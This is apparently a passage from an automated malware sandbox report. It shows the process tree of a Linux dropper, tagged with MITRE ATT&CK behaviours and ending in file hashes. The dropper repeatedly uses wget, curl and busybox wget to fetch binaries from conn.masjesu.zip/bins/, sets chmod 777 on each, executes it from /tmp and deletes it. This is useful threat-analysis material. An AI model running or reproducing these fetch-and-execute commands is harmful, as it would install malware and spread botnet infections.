- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:954
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵
- System Network Configuration Discovery
PID:956
-
-
/bin/chmodchmod 777 VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵
- File and Directory Permissions Modification
PID:957
-
-
/tmp/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O./VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵
- Executes dropped EXE
PID:958
-
-
/bin/rmrm VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵PID:959
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵
- System Network Configuration Discovery
PID:960
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:961
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵
- System Network Configuration Discovery
PID:963
-
-
/bin/chmodchmod 777 nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵
- File and Directory Permissions Modification
PID:964
-
-
/tmp/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ./nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵
- Executes dropped EXE
PID:965
-
-
/bin/rmrm nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵PID:966
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵PID:967
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:968
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵
- System Network Configuration Discovery
PID:970
-
-
/bin/chmodchmod 777 UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵
- File and Directory Permissions Modification
PID:971
-
-
/tmp/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S./UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵
- Executes dropped EXE
PID:972
-
-
/bin/rmrm UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵PID:973
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵
- System Network Configuration Discovery
PID:974
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:975
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵
- System Network Configuration Discovery
PID:977
-
-
/bin/chmodchmod 777 rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵
- File and Directory Permissions Modification
PID:978
-
-
/tmp/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A./rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵
- Executes dropped EXE
PID:979
-
-
/bin/rmrm rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵PID:980
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵PID:981
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:982
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵
- System Network Configuration Discovery
PID:984
-
-
/bin/chmodchmod 777 cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵
- File and Directory Permissions Modification
PID:985
-
-
/tmp/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv./cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵
- Executes dropped EXE
PID:986
-
-
/bin/rmrm cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵PID:987
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵
- System Network Configuration Discovery
PID:988
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:989
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵
- System Network Configuration Discovery
PID:991
-
-
/bin/chmodchmod 777 M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵
- File and Directory Permissions Modification
PID:992
-
-
/tmp/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp./M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵
- Executes dropped EXE
PID:993
-
-
/bin/rmrm M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵PID:994
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵
- System Network Configuration Discovery
PID:995
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:996
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵
- System Network Configuration Discovery
PID:998
-
-
/bin/chmodchmod 777 rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵
- File and Directory Permissions Modification
PID:999
-
-
/tmp/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4./rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵
- Executes dropped EXE
PID:1000
-
-
/bin/rmrm rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵PID:1001
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵
- System Network Configuration Discovery
PID:1002
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1003
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵
- System Network Configuration Discovery
PID:1005
-
-
/bin/chmodchmod 777 k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵
- File and Directory Permissions Modification
PID:1006
-
-
/tmp/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7./k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵
- Executes dropped EXE
PID:1007
-
-
/bin/rmrm k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵PID:1008
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵PID:1009
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1010
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵
- System Network Configuration Discovery
PID:1012
-
-
/bin/chmodchmod 777 ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵
- File and Directory Permissions Modification
PID:1013
-
-
/tmp/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw./ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵
- Executes dropped EXE
PID:1014
-
-
/bin/rmrm ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵PID:1015
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵
- System Network Configuration Discovery
PID:1016
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1017
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵
- System Network Configuration Discovery
PID:1019
-
-
/bin/chmodchmod 777 ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵
- File and Directory Permissions Modification
PID:1020
-
-
/tmp/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn./ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵
- Executes dropped EXE
PID:1021
-
-
/bin/rmrm ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵PID:1022
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97